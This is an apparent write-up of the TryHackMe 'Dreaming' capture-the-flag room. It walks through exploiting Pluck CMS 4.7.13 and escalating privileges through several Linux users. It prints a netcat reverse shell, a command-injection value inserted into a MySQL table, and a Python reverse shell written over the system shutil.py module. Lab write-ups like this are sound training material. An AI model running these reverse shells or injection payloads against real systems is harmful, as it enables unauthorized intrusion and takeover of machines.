We covered TryHackMe Dreaming challenge where we demonstrated penetration testing concepts such as exploiting a vulnerable version of Pluck CMS to gain a reverse shell. Then we started the process of horizontal Linux privilege escalation. We moved between various users with alternating privileges such as www-data, lucien, death and morpheus. A combination of weak file permissions, incorrectly assigned privileges and hard coded credentials we were able to escalate privileges to the highest user, Morpheus, and wrap up the challenge.
The first thing we’re going to start as you can see with the Nmap scan which reveals two open ports namely 22 and 80.
We start with the web page at port 80 and its the default Apache page which turns us to use gobuster to reveal the directory /app.
So the path reveals as you can see the app directly along with the technology used on the web server, which is pluck CMS along with the version 4.7.13. The version is given the technology of the software so you have to search for matching exploit using searchsploit. The exploit requires an authenticated access which can be obtained by clicking on ‘admin’ link and using ‘password’ as the password to login to the administration panel of Pluck CMS. Therefore we have the requirements to run the exploit and upload the webshell.
From the webshell, we can use netcat reverse shell : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.81.146 4547 >/tmp/f
So we see we have two Python scripts under /opt one is getdreams.py and the other one is test.py which contains the plain text password of the user Lucien.
Next using sudo -l to view the privileges of the user lucien to find that lucien can execute the below as the user death
sudo -u death /user/lib/python3.8 /home/death/getDreams.py
GetDreams.py is a python script to perform some operations on the my SQL Server so why shouldn’t we log into the my SQL server and find out what is going on? Right? So how to look into my SQL Server. We take a look at the bash history file of the user lucien:
cat .bash_history The output will reveal the full command to login to the MYSQL server.
When we log into my SQL Server, we will start the process of MySQL enumeration so first we show the databases as you can see we have one unique database named Library.
select * from dreams;
INSERT INTO dreams (dreamer, dream) VALUES (“injection” , “$(/bin/bash)”;
We know that Lucian can run the python script as sudo so now if you execute We’re going to have shell as the death user.
So from the www-data into Lucien and now to the Morpheus user.
So how to escalate a privileges first particular look at the contents of the directory belonging to that user. I will see there is a script named restore.py which is a python script if we take a look at the python script we see it uses shutil module in python to perform backup. So a quick look at this file in /usr/lib/python3.8/shutil.py reveals that the group death can edit on this file so we insert a python reverse shell after we null its content to get the last shell as morpheus user.
echo “” > /usr/lib/python3.8/shutil.py
echo “import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,4242));subprocess.call([“/bin/sh”,”-i”],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())” > /usr/lib/python3.8/shutil.py